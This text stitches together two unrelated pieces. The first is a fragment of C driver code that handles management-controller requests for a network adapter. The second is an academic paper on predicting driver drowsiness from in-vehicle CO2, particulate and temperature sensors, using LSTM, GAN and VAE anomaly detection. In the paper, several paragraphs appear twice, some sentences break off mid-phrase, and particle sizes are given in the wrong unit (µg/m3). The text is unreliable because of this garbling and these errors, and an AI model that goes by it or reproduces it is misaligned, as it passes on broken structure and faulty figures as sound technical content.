sfxge_mcdi_release(struct sfxge_mcdi *mcdi) { mtx_lock(&mcdi->lock); KASSERT((mcdi->state == SFXGE_MCDI_BUSY || mcdi->state == SFXGE_MCDI_COMPLETED), ("MCDI not busy or task not completed")); mcdi->state = SFXGE_MCDI_INITIALIZED; cv_broadcast(&mcdi->cv); mtx_unlock(&mcdi->lock); } static void sfxge_mcdi_timeout(struct sfxge_softc *sc) { device_t dev = sc->dev; log(LOG_WARNING, "[%s%d] MC_TIMEOUT", device_get_name(dev), device_get_unit(dev)); EFSYS_PROBE(mcdi_timeout); sfxge_schedule_reset(sc); } static void sfxge_mcdi_poll(struct sfxge_softc *sc) { efx_nic_t *enp; clock_t delay_total; clock_t delay_us; boolean_t aborted; delay_total = 0; delay_us = SFXGE_MCDI_POLL_INTERVAL_MIN; enp = sc->enp; do { if (efx_mcdi_request_poll(enp)) { EFSYS_PROBE1(mcdi_delay, clock_t, delay_total); return; } if (delay_total > SFXGE_MCDI_WATCHDOG_INTERVAL) { aborted = efx_mcdi_request_abort(enp); KASSERT(aborted, ("abort failed")); sfxge_mcdi_timeout(sc); return; } /* Spin or block depending on delay interval. */ if (delay_us < 1000000) DELAY(delay_us); else pause("mcdi wait", delay_us * hz / 1000000); delay_total += delay_us; /* Exponentially back off the poll frequency. */ delay_us = delay_us * 2; if (delay_us > SFXGE_MCDI_POLL_INTERVAL_MAX) delay_us = SFXGE_MCDI_POLL_INTERVAL_MAX; } while (1); } static void sfxge_mcdi_execute(void *arg, efx_mcdi_req_t *emrp) { struct sfxge_softc *sc; struct sfxge_mcdi *mcdi; sc = (struct sfxge_softc *)arg; mcdi = &sc->mcdi; sfxge_mcdi_acquire(mcdi); /* Issue request and poll for completion. */ efx_mcdi_request_start(sc->enp, emrp, B_FALSE); sfxge_mcdi_poll(sc); sfxge_mcdi_release(mcdi); } static void sfxge_mcdi_ev_cpl(void *arg) { struct sfxge_softc *sc; struct sfxge_mcdi *mcdi; sc = (struct sfxge_softc *)arg; mcdi = &sc->mcdi; mtx_lock(&mcdi->lock); KASSERT(mcdi->state == SFXGE_MCDI_BUSY, ("MCDI not busy")); mcdi->state = SFXGE_MCDI_COMPLETED; cv_broadcast(&mcdi->cv); mtx_unlock(&mcdi->lock); } static void sfxge_mcdi_exception(void *arg, efx_mcdi_exception_t eme) { struct sfxge_softc *sc; device_t dev; sc = (struct sfxge_softc *)arg; dev = sc->dev; log(LOG_WARNING, "[%s%d] MC_%s", device_get_name(dev), device_get_unit(dev), (eme == EFX_MCDI_EXCEPTION_MC_REBOOT) ? "REBOOT" : (eme == EFX_MCDI_EXCEPTION_MC_BADASSERT) ? "BADASSERT" : "UNKNOWN"); EFSYS_PROBE(mcdi_exception); sfxge_schedule_reset(sc); } int sfxge_mcdi_init(struct sfxge_softc *sc) { efx_nic_t *enp; struct sfxge_mcdi *mcdi; efx_mcdi_transport_t *emtp; int rc; enp = sc->enp; mcdi = &sc->mcdi; emtp = &mcdi->transport; KASSERT(mcdi->state == SFXGE_MCDI_UNINITIALIZED, ("MCDI already initialized")); mtx_init(&mcdi->lock, "sfxge_mcdi", NULL, MTX_DEF); mcdi->state = SFXGE_MCDI_INITIALIZED; emtp->emt_context = sc; emtp->emt_execute = sfxge_mcdi_execute; emtp->emt_ev_cpl = sfxge_mcdi_ev_cpl; emtp->emt_exception = sfxge_mcdi_exception; cv_init(&mcdi->cv, "sfxge_mcdi"); if ((rc = efx_mcdi_init(enp, emtp)) != 0) goto fail; return (0); fail: mtx_destroy(&mcdi->lock); mcdi->state = SFXGE_MCDI_UNINITIALIZED; return (rc); } void sfxge_mcdi_fini(struct sfxge_softc *sc) { struct sfxge_mcdi *mcdi; efx_nic_t *enp; efx_mcdi_transport_t *emtp; enp = sc->enp; mcdi = &sc->mcdi; emtp = &mcdi->transport; mtx_lock(&mcdi->lock); KASSERT(mcdi->state == SFXGE_MCDI_INITIALIZED, ("MCDI not initialized")); efx_mcdi_fini(enp); bzero(emtp, sizeof(*emtp)); cv_destroy(&mcdi->cv); mtx_unlock(&mcdi->lock); mtx_destroy(&mcdi->lock); }
An Automobile Environment Detection System Based on Deep Neural Network and its Implementation Using IoT-Enabled In-Vehicle Air Quality Sensors : This paper elucidates the development of a deep learning–based driver assistant that can prevent driving accidents arising from drowsiness. As a precursor to this assistant, the relationship between the sensation of sleep depravity among drivers during long journeys and CO 2 concentrations in vehicles is established. Multimodal signals are collected by the assistant using five sensors that measure the levels of CO, CO 2 , and particulate matter (PM), as well as the temperature and humidity. These signals are then transmitted to a server via the Internet of Things, and a deep neural network utilizes this information to analyze the air quality in the vehicle. The deep network employs long short-term memory (LSTM), skip-generative adversarial network (GAN), and variational auto-encoder (VAE) models to build an air quality anomaly detection model. The deep learning models gather data via LSTM, while the semi-supervised deep learning models collect data via GANs and VAEs. The purpose of this assistant is to provide vehicle air quality information, such as PM alerts and sleep-deprived driving alerts, to drivers in real time and thereby prevent accidents. Introduction Sleep deprivation (drowsiness) and impaired cognition can cause traffic accidents , and the number of traffic accidents due to driver drowsiness and fatigue is increasing annually. According to the Korea Expressway Corporation, 180 out of the 942 highway traffic accident casualties that occurred from 2012 to 2017 were due to drowsy driving. Driver drowsiness is especially dangerous at high speeds, as losing consciousness even for 3 s at 100 km/h will cause the driver to skip approximately 100 m. Damage from public transport accidents is even more severe. Driver drowsiness can be caused by conditions such as driver fatigue, lack of sleep, chronic fatigue, and an increased CO 2 concentration in the vehicle. Fatigue and headaches during driving are caused not only because of health conditions but also owing to the air quality inside the vehicle, especially when driving for long periods. A major cause of driver drowsiness is lack of ventilation. Therefore, proper ventilation and fresh air recirculation should prevent drowsiness . Previous studies have been focused on the development of sensors and algorithm-based technologies to recognize and process driver and environmental conditions. Although camera-based recognition determines driver drowsiness, its performance depends on the circumstances and its adoption is limited owing to high costs. Most driver state detection (DSD) technologies adopt methods based on cameras or other sensors, but these devices are difficult to install and may constrain the behavior of drivers. Most in-vehicle DSD systems are also less reliable than rule-based artificial Trends in ADAS Research The progress in autonomous driving technology is drawing considerable attention toward research on ADASs owing to their potential with regard to precision driver safety . To prevent accidents, some governments and automakers of countries that promote autonomous driving are expediting the development and adoption of ADASs by mandating their integration. Functions for safe driving (e.g., forward collision warnings), which integrate driver monitoring systems (DMSs) and ADASs, are essential for autonomous cars of Level 3 and above . In autonomous driving, safety is not possible without these technologies. Autonomous vehicles integrate intelligent sensors and information and communication technology with mechanical and traffic technologies to help drivers navigate safely using self-aware systems and judgment control. Furthermore, they utilize recognition technology for location and obstacle detection, judgment technology that determines the next course of action based on the detection, and control technology that quickly and precisely executes the appropriate action . This approach is being developed further for the next generation of autonomous vehicles and will use in-vehicle sensor hardware integrated with deep learning. In addition, it is important to integrate the aforementioned functions seamlessly into a robust, unified system . Moreover, DMSs have become crucial as it has become necessary to comply with standards such as those enforced by the New Car Assessment Programme (NCAP). Because of the integration of DMSs into automobiles as the primary safety features in the context of the European NCAP, the market for DMS is expected to grow rapidly owing to the widespread adoption of in-vehicle systems. A DMS analyzes the facial expressions and biometric information of the driver to identify and monitor his or her condition. Infrared camera modules are installed on the steering wheel to track the eyes and face direction of the driver, enabling the system to warn the driver through the medium of sound upon detecting drowsiness or squinting. Pressure sensors and vibration actuators are embedded in the seatbelt and seat to monitor the breathing, heart rate, and pulse of the driver. These devices identify drowsiness and provide tactile warnings. Predicting Driver Drowsiness There are several techniques for predicting driver drowsiness. In psychophysiological approaches , electronic devices are attached to the skin of the driver to determine his or her condition from biological signals via various methods, including electroencephalography, electrocardiography, electrooculography, and electromyography. As drowsiness impairs muscle coordination, and consequently the ability to drive, a second approach involves analyzing vehicle operation information to infer the psychophysiological state of the driver. This approach involves analyzing steering wheel movement, driving speed, and degree of lane departure . A third approach for DSD is based on visual information obtained by performing image processing on driver behavior . Portions of the face of the driver are tracked and analyzed to detect signs of drowsiness, such as yawning in the mouth region and eye activity . In relatively recent studies, vehicular operation and visual driver information have been utilized to perform DSD. The visual characteristics (from facial parts such as the eyes, and mouth), vehicle operation (to infer the physical characteristics of the driver), and vehicle measurements are analyzed to determine driver drowsiness or distraction level . Representative DSD technologies include facial recognition, heartbeat detection, and lane departure detection. In facial recognition, in-vehicle near-infrared cameras are used to monitor the eye activity of the driver to detect driver fatigue, drowsiness, and poor physical conditions . In this method, facial feature points such as muscles, expressions, and facial direction are extracted, converted into images, and subjected to pattern recognition. However, this approach requires further improvement. Technology that can identify and analyze the biosignals of the driver (e.g., pulse, heart rate, brain blood flow, brain waves, body temperature, sweat, and degree of body load) is emerging . For instance, a slow heart rate may indicate drowsy driving, and the DSD system can alert the driver when the heart rate falls below a threshold. Detection devices are being integrated with various equipment for supplementary tasks such as driver drowsiness and lane departure detection, primarily by automobile and component manufacturers. The development of a driver monitoring technology that captures, recognizes, and judges driver behavior efficiently through parameters such as steering wheel operation is also advancing . When driving a vehicle, a driver performs basic operations such as adjusting the steering wheel, pushing the accelerator pedal, and checking the mirror. Under a reduced focus, the ability of the driver to perform these basic operations is compromised. In lane departure detection, active measures are utilized-for example, the generation of a strong vibration in the steering wheel when the vehicle departs from the lane or begins departure without the driver activating the turn signal. If the automobile travels on a lane for a certain period and crosses the left yellow line or if the steering wheel angle is outside the normal range, the system considers the driver to be drowsy and generates a warning. A built-in drowsiness prevention system activates the lane departure warning system along with the brakes as well as a complementary warning when the automobile is too close to the vehicle in front. This technology also includes a function to shorten the brake system deployment time automatically to avoid collisions. Under mild drowsiness, the system only provides voice assistance. However, if an extreme situation such as deep drowsiness or fainting is identified, the system not only provides voice assistance but also vibrates the seat to wake up the driver to prevent an accident. Likewise, when the vehicle departs from the lane, the pedal vibrates to warn the driver. In similar dangerous situations, the Pre-Safe seat belt tightens two or three times. Hence, the vehicle systems can actively intervene to reduce the risk of an accident . Effect of CO 2 Several studies have indicated that air quality is better inside vehicles than that outside. However, the California Air Resources Board reported that the amounts of hydrocarbons and CO 2 within the vehicle are at least two to 10 times those outside the vehicle . Furthermore, some areas, such as China and Hong Kong, are highly affected by particulate matter (PM). In the case of severe dust, it has been reported that in-vehicle air conditioning systems are not ventilated via external ventilation . In particular, if the in-vehicle filter is not replaced at an appropriate time, the air quality is worse inside the vehicle than that outside it, because of the concentration of CO 2 inside the vehicle. In this regard, the situation in Korea is similar to that in China and Hong Kong. Accordingly, in Korea, indoor air quality is regulated through the Indoor Air Quality Control Act. The contaminants to be managed are as follows: particulate matter (PM 10 and PM 2.5 ), carbon dioxide (CO 2 ), formaldehyde, total airborne bacteria, carbon monoxide (CO), nitrogen dioxide (NO 2 ), radon (Rn), volatile organic compounds (VOCs), asbestos, ozone, mold, benzene, toluene ethylbenzene, xylene, and styrene. The management standards are as follows. The concentrations of PM 10 , PM 2.5 , CO 2 , and CO should be less than 100 µg/m 3 , 50 µg/m 3 , 1,000 ppm, and 10 ppm, respectively, according to the standards. In accordance with Korean laws and standards, the criteria for toxic indoor pollutants and poor air quality were also specified in this study. In addition, when the air filter is not replaced regularly or when the external concentration of PM is high during a certain period, which can be the case in Korea, the CO 2 concentration in the vehicle increases rapidly when the internal circulation mode is utilized . The factors affecting the air quality inside automobiles can be divided into internal pollutants, such as external air, exhaust fumes emitted from other vehicles, odors from factories and agricultural lands, and external pollutants, such as dust from tires and roads, CO 2 from respiration, and VOCs produced by the interior components of the vehicle (Figure 1). In addition, new cars generally have extremely high formaldehyde contents. The concentrations of pollutants from vehicle exhausts are higher inside the vehicle than those outside. contaminants to be managed are as follows: particulate matter (PM10 and PM2.5), carbon dioxide (CO2), formaldehyde, total airborne bacteria, carbon monoxide (CO), nitrogen dioxide (NO2), radon (Rn), volatile organic compounds (VOCs), asbestos, ozone, mold, benzene, toluene ethylbenzene, xylene, and styrene. The management standards are as follows. The concentrations of PM10, PM2.5, CO2, and CO should be less than 100 µ g/m 3 , 50 µ g/m 3 , 1,000 ppm, and 10 ppm, respectively, according to the standards. In accordance with Korean laws and standards, the criteria for toxic indoor pollutants and poor air quality were also specified in this study. In addition, when the air filter is not replaced regularly or when the external concentration of PM is high during a certain period, which can be the case in Korea, the CO2 concentration in the vehicle increases rapidly when the internal circulation mode is utilized . The factors affecting the air quality inside automobiles can be divided into internal pollutants, such as external air, exhaust fumes emitted from other vehicles, odors from factories and agricultural lands, and external pollutants, such as dust from tires and roads, CO2 from respiration, and VOCs produced by the interior components of the vehicle (Figure 1). In addition, new cars generally have extremely high formaldehyde contents. The concentrations of pollutants from vehicle exhausts are higher inside the vehicle than those outside. It is difficult to lower the windows to ventilate the car while driving on urban streets. However, if the air conditioning system is used only in the internal circulation mode, CO2 from respiration will cause O2 depletion, causing fatigue and impaired muscle coordination and judgement, which is ultimately manifested as drowsiness. Medical journals and industrial safety studies have indicated that the level of CO2 affects sleepiness and fatigue, but more research is needed on the direct causal relationship between CO2 and sleepiness . According to data published by the Korea Road Traffic Authority, when the occupancy of an express bus is 70%, the average CO2 concentration in the vehicle is 3422 ppm, with a maximum of 6765 ppm after 90 min of driving . If the CO2 concentration exceeds 2000 ppm, the driver may experience a headache or drowsiness. A concentration exceeding 5000 ppm will drastically reduce the O2 level and cause brain injury. Concurring with these findings, in 2012, the American Association of Occupational Health published a study on drowsy driving that indicated that if the CO2 concentration in a confined space exceeds 2000 ppm, the occupants may experience headaches or drowsiness . The potential health problems associated with high CO2 concentrations are listed in Table 1. It is difficult to lower the windows to ventilate the car while driving on urban streets. However, if the air conditioning system is used only in the internal circulation mode, CO 2 from respiration will cause O 2 depletion, causing fatigue and impaired muscle coordination and judgement, which is ultimately manifested as drowsiness. Medical journals and industrial safety studies have indicated that the level of CO 2 affects sleepiness and fatigue, but more research is needed on the direct causal relationship between CO 2 and sleepiness . According to data published by the Korea Road Traffic Authority, when the occupancy of an express bus is 70%, the average CO 2 concentration in the vehicle is 3422 ppm, with a maximum of 6765 ppm after 90 min of driving . If the CO 2 concentration exceeds 2000 ppm, the driver may experience a headache or drowsiness. A concentration exceeding 5000 ppm will drastically reduce the O 2 level and cause brain injury. Concurring with these findings, in 2012, the American Association of Occupational Health published a study on drowsy driving that indicated that if the CO 2 concentration in a confined space exceeds 2000 ppm, the occupants may experience headaches or drowsiness . The potential health problems associated with high CO 2 concentrations are listed in Table 1. Air Quality Sensor (AQS) If an automobile is driven for a long time, the amount of CO 2 in its cabin will increase and O 2 will be depleted owing to respiration. O 2 depletion, in turn, causes fatigue and drowsy driving . Hence, CO 2 causes fatigue, reduces O 2 levels, and impairs driver muscle coordination and judgement. Thus, to improve fatigue prevention techniques, an autonomous system to monitor air pollution in vehicles during journeys and to improve air quality is needed. In recent years, various studies have been conducted to develop technologies for filtering harmful substances and odors, including general air pollutants, vehicle exhaust gases, and VOCs, from automobiles . However, these filter systems have design limitations. High-end automobiles are equipped with air conditioners that monitor the CO 2 level in the cabin, recirculate fresh air, and provide a warning when a certain CO 2 level is exceeded. These air conditioners have been upgraded to regulate PM. When a high concentration of PM is detected in the vehicle, the air inside the vehicle is discharged, and fresh air is sucked in, filtered, and recirculated throughout the vehicle by the improved air conditioning system . Such technologies are already under development. For example, compact integrated air quality sensors (AQSs) for monitoring indoor air pollution, PM2.5 concentration sensors, surface treatment technology for microbial habitat (mold) suppression, disinfectors in air conditioning system components (such as heat exchangers) and cluster ionizers for air purification, generator technology, cabin filter replacement notification devices, and integrated air conditioning systems, such as multi-function air cleaners, are being developed . We developed an IoT-enabled vehicle AQS for measuring the concentrations of CO 2 , PM, and other pollutants. Furthermore, based on sensor measurements, we devised a DSD system for drowsy driving accident prevention . For the AQS, we collected information from five types of sensors (CO, CO 2 , PM, temperature, and humidity sensors) with the performance specifications summarized in Table 2. The measured value depends on the operating temperature. We aimed to develop a system and service that can recognize and monitor various problems that may occur during vehicle operation, such as driver drowsiness due to CO 2 , hazardous in-vehicle PM levels, hazardous gas leakage, and fire hazards. Type: NDIR (Nondispersive Infrared) Sensor Measurement Range: 0-5,000 ppm Accuracy: 400-5000 ppm ± 75 ppm or 10% of reading, whichever is greater Operating Temperature: +10-+50 with an aerodynamic diameter equal to or less than 2.5 µg/m 3 is referred to as PM 2.5 , and PM with a diameter between 2.5 and 10 µg/m 3 is referred to as PM 10 . PM with a diameter less than 1.0 µg/m 3 is defined as PM 1 IoT Sensor Platform In this research, we integrated an AQS with the IoT. The purpose of the IoT is to use connected technologies to develop a "smarter" environment, enabling lifestyle simplification by saving time, energy, and money. Through this technology, industries can reduce expenditures. The enormous investments and several studies conducted on the IoT have made it an increasing trend in recent years. The IoT involves a set of connected devices that can transfer data among themselves to optimize their performance. These actions occur automatically and without human awareness or input. The IoT sensor platform ( Figure 2) includes four main components-1) sensors, 2) processing networks, 3) data analysis, and 4) system monitoring. Modern IoT-enabled sensor solutions analyze collected data, perform real-time analysis, and provide timely notifications of the sensor status based on measurements, to increase managerial and response efficiencies. Key technologies such as deep learning and distributed parallel processing are used to analyze patterns in the collected data and to detect anomalies in real time . Pre-trained deep learning solutions can accurately monitor driver health and detect operational anomalies for all types of sensors. AI-based sensor solutions can reduce operational and managerial costs . In fact, unnecessary support for system checks can be reduced using these solutions. Moreover, sensor data compensation technology can be used to improve the performance of low-cost sensors, reach a level of precision similar to those of expensive precision instruments, and reduce the initial investment, especially for large sensors. *PM (Particulate matter) with an aerodynamic diameter equal to or less than 2.5 µ g/m 3 is referred to as PM2.5, and PM with a diameter between 2.5 and 10 µ g/m 3 is referred to as PM10. PM with a diameter less than 1.0 µ g/m 3 is defined as PM1 IoT Sensor Platform In this research, we integrated an AQS with the IoT. The purpose of the IoT is to use connected technologies to develop a "smarter" environment, enabling lifestyle simplification by saving time, energy, and money. Through this technology, industries can reduce expenditures. The enormous investments and several studies conducted on the IoT have made it an increasing trend in recent years. The IoT involves a set of connected devices that can transfer data among themselves to optimize their performance. These actions occur automatically and without human awareness or input. The IoT sensor platform ( Figure 2) includes four main components-1) sensors, 2) processing networks, 3) data analysis, and 4) system monitoring. Modern IoT-enabled sensor solutions analyze collected data, perform real-time analysis, and provide timely notifications of the sensor status based on measurements, to increase managerial and response efficiencies. Key technologies such as deep learning and distributed parallel processing are used to analyze patterns in the collected data and to detect anomalies in real time . Pre-trained deep learning solutions can accurately monitor driver health and detect operational anomalies for all types of sensors. AI-based sensor solutions can reduce operational and managerial costs . In fact, unnecessary support for system checks can be reduced using these solutions. Moreover, sensor data compensation technology can be used to improve the performance of low-cost sensors, reach a level of precision similar to those of expensive precision instruments, and reduce the initial investment, especially for large sensors. Deep Learning-Based Sensors The IoT and "smart cities" are generating substantial amounts of time-series sensor data for analysis. The importance of sensors has been further highlighted in smart mobility for autonomous Deep Learning-Based Sensors The IoT and "smart cities" are generating substantial amounts of time-series sensor data for analysis. The importance of sensors has been further highlighted in smart mobility for autonomous vehicles, which have witnessed active research and development. Automotive original equipment manufacturers (OEMs), semiconductor firms, AI companies, and software startups have led to the rapid development of related technologies and platforms. Sensors are key components of automobiles, similar to their role in all products of highly interconnected technology-intensive industries. Research on AI, computer vision, and sensor networks is helping to reduce driver and pedestrian accidents in some countries, increasing the adoption of technology to enhance safety. Extensive research is being conducted on deep learning to enable computers to determine optimal algorithms via artificial neural networks that resemble human neural networks using large volumes of data. Deep learning is a popular machine learning approach that has achieved significant progress in all traditional machine learning fields . Deep learning techniques are becoming indispensable in autonomous driving, for tasks such as the recognition of people, cars, and lanes surrounding autonomous vehicles . In fact, deep learning can handle the numerous variables in a driving environment that otherwise hinder the development of conventional algorithms. In the same vein, real-time, high-performance semantic segmentation based on deep learning for driving environment recognition has been developed successfully. For instance, SegNet is a system that visually monitors the status of the driver and identifies characteristics such as pupil status, eye blinking, and gaze via deep learning algorithms. Facial landmark information allows SegNet to analyze the head pose and gaze to identify the awareness level of the driver . Moreover, deep learning has been used to process important in-vehicle sensor data. In contrast, the use of the sensors has recently increased in various fields, such as anomaly detection, whose principles can be applied to DSD . In the following sections, we discuss three deep learning algorithms used in sensing systems for anomaly detection . Deep Learning-Based Anomaly Detection The identification of items or patterns in a dataset that do not conform to other items or an expected pattern is referred to as anomaly detection. These unexpected patterns may be called anomalies, outliers, novelties, exceptions, noise, surprises, or deviations . Anomaly detection reveals unexpected patterns in the data. Further, it is widely used in various fields, including fraud detection, intrusion detection, safety critical systems, health monitoring, detecting illegal use of credit cards, detecting eco-system disturbances, and military surveillance . Moreover, it can be used in preprocessing to remove outliers from datasets, which can significantly improve the performance of subsequent machine learning algorithms, especially in supervised learning tasks. Studies on sensor networks constitute emerging research topics, and it is difficult to collect information without errors from wireless sensors. It is particularly important from a data analysis perspective because of its special features. Abnormal values in sensor network data indicate that the sensor has correctly identified an abnormal event or that there is a problem in the sensor . Thus, sensor network anomaly detection involves both sensor malfunctions and intrusions . The types of data collected by sensors vary widely and include binary, discrete, continuous, voice, and video data, which are continuously generated. Data may be noisy or missing, depending on the environment in which the sensor is installed. Sensor network anomaly detection has many challenges because it functions in real time. Because sensors are installed in multiple locations, a distributed data mining approach is required for analysis. Noise and missing values must be distinguished from outliers. Anomaly detection has also been studied using in situ data with respect to time. The problem of abnormality detection in time-series data is as follows. Time-series data follow a continuous series of data points in a temporal order, and a specific point in time is highly affected by the preceding and following values. In general, the analysis is conducted by selecting an appropriate time window. This window is classified according to whether the objective of the analysis is to find an abnormal point in the time data or an abnormal pattern of change . The label indicates whether or not the data entity is abnormal. The use of the training material to label inaccuracies (i.e., to perform classification) incurs a tremendous computational effort and cost. It is substantially difficult to classify all possible types of anomalies. If an abnormality has appeared rarely or if a new type of abnormality has emerged, it is difficult obtain a classified data entity. Therefore, it is necessary to deal with unlabeled data. There are many challenges in the task of anomaly detection that distinguish it from a binary classification task. For example, because anomalous systems exhibit considerably more diverse behaviors than a normal system and are rare by nature, anomalous data are often severely underrepresented in training sets . There are three broad categories of anomaly detection techniques, based on the extent to which labeled data are available: supervised, semi-supervised, and unsupervised. In supervised anomaly detection, a binary (abnormal and normal) labeled dataset is given; then, a binary classifier is trained using this data. This approach should address the unbalanced dataset problem resulting from the existence of few data points with abnormal labels. Semi-supervised anomaly detection techniques require a training set that contains only normal data points. Anomalies are detected by building the normal behavior model of the system, then testing the likelihood of generation of the test data point by using the learned model. Unsupervised anomaly detection techniques deal with unlabeled datasets by making the implicit assumption that most data points are normal . Supervised anomaly detection is used when label information is available for all entities in the learning material or a classification model is learned to determine anomalies; this is the most common approach. Generally, the data are in an imbalanced state in which the abnormality rate is negligible compared to the normal rate . Semi-supervised anomaly detection is used when label information is only available for the learning subjects and the normality/abnormality status is not known for materials without label information. Generally, the model is trained using only normal data and is then applied to the test data . Unsupervised anomaly detection is the most widely used anomaly detection method for unlabeled data. In this method, outlier detection is mainly based on the distance between the entities in the data. In general, it is assumed that the ratio of the normal data is overwhelmingly large. If this assumption is wrong, problems such as high false alarm rates occur . When a labeled dataset can be generated by relating historical data and sensor data over time (i.e., when the data samples from sensors are labeled as normal or abnormal states), representative patterns in the measured values can be determined. In fact, labeled data and deep learning models enable computers to learn patterns from sensor measurements by supervised learning. Thus, supervised learning cannot be used in the initial stage (for example, when a sensor is first installed or when no historical data are available). In these cases, unsupervised learning is adopted to monitor the sensor state as it does not require labeled data. In unsupervised learning, anomalies such as sensor failures can be determined directly from measurements without relying on historical data. The deep learning model can be enhanced later with labeled data for more systematic processing of sensor measurements. In general, unsupervised anomaly detection algorithms provide similarity scores between measurements and normal data to indicate anomalies based on a threshold . Unsupervised learning facilitates the detection of abnormal patterns from periodic data, as most sensors exhibit periodic measurement behaviors. Then, by using a generative model, it is possible to input a periodic pattern and to generate synthetic data for one cycle in the form of a probability distribution. The generative adversarial network (GAN) and variational auto-encoder (VAE) are common generative models for synthesizing sensor data from a given process . Long Short-Term Memory (LSTM) Model To prevent the loss of historic data and to leverage such data, long shot-term memory (LSTM) has been used extensively owing to its promising results . Instead of simply accumulating historical information, LSTM introduces cell states and gate structures to select and deliver important information. The cell state contains the information obtained in the previous step. Rather than simply passing on this information to the next step, the forget and input gates determine the amount of information that will be discarded and the amount of new input data that will be reflected to update the cell state. LSTM networks have been proven to be well suited for dealing with and predicting important events with long intervals and delays in a time series. LTSM networks can maintain long-term memory. In an LTSM network, a stacked LSTM hidden layer makes it possible to learn a high-level temporal feature without any fine tuning or preprocessing, which is otherwise required by other techniques . Data collected from a sensor is learned via LSTM to train the model. This trained model is then used to estimate the sensor measurement values in real time. LSTM is a deep learning model suitable for modeling time-series data such as sensor measurements. To predict the value at time t, the structure uses data from instants (t − n), (t − n + 1), . . . , (t − 1), for some n, as input. LSTM can model the autocorrelation of the time-series data without requiring the assumption of stationarity and learn the temporal patterns of time-series data . Xie et al. trained a LSTM model with data collected by a sensor and used the trained model to estimate the sensor measurements in real time. In the case of a steady-state sensor, there is little difference in the residual errors between the values estimated by the LSTM model and the actual measured values. This residual error can be used to detect points of frequent anomalies. Experiments with actual IoT sensor data have indicated that abnormality detection using LSTM mainly detects the sudden change of a value efficiently . Skip-GANs and VAEs These are methods of detecting abnormal patterns from a periodic pattern. A majority of sensor data have periodic change patterns in which similar patterns recur at regular intervals. Using a generative model, it is possible to learn the process of generating data for one cycle in the form of a probability distribution by inputting a continuously changing pattern. The skip-GAN and VAE are representative generative models and can learn new patterns from similar patterns by learning the patterns of input data . Both models train common sensor data patterns to artificially generate sensor data with similar patterns. The data generated by the generative model is similar to the actual measured values in the case of a steady-state sensor but different in the case of an abnormal state . The difference between the pattern of the changes in the measured values and that generated by the generative model is quantified by using an anomaly score, where the greater the likelihood of the anomaly, the higher is the anomaly score . To demonstrate the significance of skip-GANs, we provide the example of Schlegl et al. . They proposed an algorithm for detecting diseases from medical images using a GAN. This algorithm was largely composed of learning and reasoning stages. In the learning stage, the GAN model was trained with the image of a healthy subject. In the inference step, when a new image was input, the GAN model generated an artificial image highly similar to the input image. As the GAN was trained only with normal data, the artificial image generated was assumed to be a normal image of a subject without the disease, and the anomaly score was calculated by comparing the normal image and the input image. In another report, Xu et al. proposed an anomaly detection algorithm using a VAE to monitor indicators such as the number of users of web applications and to implement appropriate measures when abnormal events occurred. In unsupervised learning methods, it is very important that the model does not overfit the specific image and that the normal pattern is well learned. To prevent these values from contributing to the loss function, Xu et al. added a random missing value to the input data and used a modified loss function. For a sensor under normal operation, data synthesized by the generative model are approximately equal to the measured data. When an anomaly occurs, however, the sensor measurements exhibit varying patterns. Hence, the difference between the synthetic and measured patterns can be used as the anomaly score, where higher values indicate a greater likelihood of an anomaly, providing an intuitive means of inferring the system status . Input Data Configuration The data collection period was selected from August 1, 2019 to September 30, 2019. Sensors were sequentially installed in 95 vehicles from SoCar, which is a car sharing platform in South Korea. The data were measured every 2 s when the customer boarded and operated the vehicle; these data were sent to the SK Planet Cloud Server. Through this process, 79 million data points were collected from the sensor. Each sensor data point collected from a vehicle of various sizes contains all the AQ parameters. During the data collection period, 95 sensors ( Figure 3) were installed in the vehicles chosen for the analysis (i.e., 30 sensors in the Carnival model of large vehicles, 32 sensors in the Avante (medium), and 33 sensors in the Morning (small)). Input Data Configuration The data collection period was selected from August 1, 2019 to September 30, 2019. Sensors were sequentially installed in 95 vehicles from SoCar, which is a car sharing platform in South Korea. The data were measured every 2 s when the customer boarded and operated the vehicle; these data were sent to the SK Planet Cloud Server. Through this process, 79 million data points were collected from the sensor. Each sensor data point collected from a vehicle of various sizes contains all the AQ parameters. During the data collection period, 95 sensors ( Figure 3) were installed in the vehicles chosen for the analysis (i.e., 30 sensors in the Carnival model of large vehicles, 32 sensors in the Avante (medium), and 33 sensors in the Morning (small)). The learning data set was selected by referring to the PM data distribution and the ultra-PM reference value was provided by Korea Environment Corporation (KEPC). We excluded some abnormal data during pre-processing, namely those with PM2.5 > 75 µ g/m 3 according to the enacting environmental authority (KEPC) and with temperatures greater than 50 °C. The data with the abovementioned conditions were excluded from the learning data set due to the effects of external air quality-that is, when PM2.5 < 75 µ g/m 3 , there is no influence of the external air quality on all the AQ parameters measured inside the vehicle. Figure 4 shows an example of the signals received from the AQS installed in the vehicle. We employed basic sensors and monitored the data in real time. The deep learning model was used to detect sensor measurements with anomalous readings, to notify the user. A function for correcting errors in the data was also included, enabling reliable data acquisition at low cost. When analyzing air quality data collected by the sensors in a vehicle during a test drive for the experiment, a typical case of abnormal detection is the smoking of a cigarette in the vehicle. Therefore, if abnormal changes in PM values were recognized, the data were intensively analyzed and applied to the model from approximately 90 s after the change in PM value. The data were manually labeled using anomaly criteria and analyzed to address the data imbalance caused by random oversampling. Subsequently, the deep neural network was trained to identify normal or abnormal conditions from the sensor data. As the input data represent a time series, LSTM was set as the basic structure, and the input data were composited for improved computational speed and optimized to maximize the detection performance. The learning data set was selected by referring to the PM data distribution and the ultra-PM reference value was provided by Korea Environment Corporation (KEPC). We excluded some abnormal data during pre-processing, namely those with PM 2.5 > 75 µg/m 3 according to the enacting environmental authority (KEPC) and with temperatures greater than 50 • C. The data with the abovementioned conditions were excluded from the learning data set due to the effects of external air quality-that is, when PM 2.5 < 75 µg/m 3 , there is no influence of the external air quality on all the AQ parameters measured inside the vehicle. Figure 4 shows an example of the signals received from the AQS installed in the vehicle. We employed basic sensors and monitored the data in real time. The deep learning model was used to detect sensor measurements with anomalous readings, to notify the user. A function for correcting errors in the data was also included, enabling reliable data acquisition at low cost. When analyzing air quality data collected by the sensors in a vehicle during a test drive for the experiment, a typical case of abnormal detection is the smoking of a cigarette in the vehicle. Therefore, if abnormal changes in PM values were recognized, the data were intensively analyzed and applied to the model from approximately 90 s after the change in PM value. Results of Deep Learning Model We applied the DSD system to actual IoT sensor data to develop a deep learning model that could accurately determine the sensor state by learning the changes in the patterns. The VAE structure provided a smaller network capacity under the same conditions. However, their detection performance was almost identical, demonstrating the successful conversion of the DSD into a lightweight structure. The experimental results demonstrated the anomaly detection performance of the proposed algorithm, which was better than the performances of existing techniques. 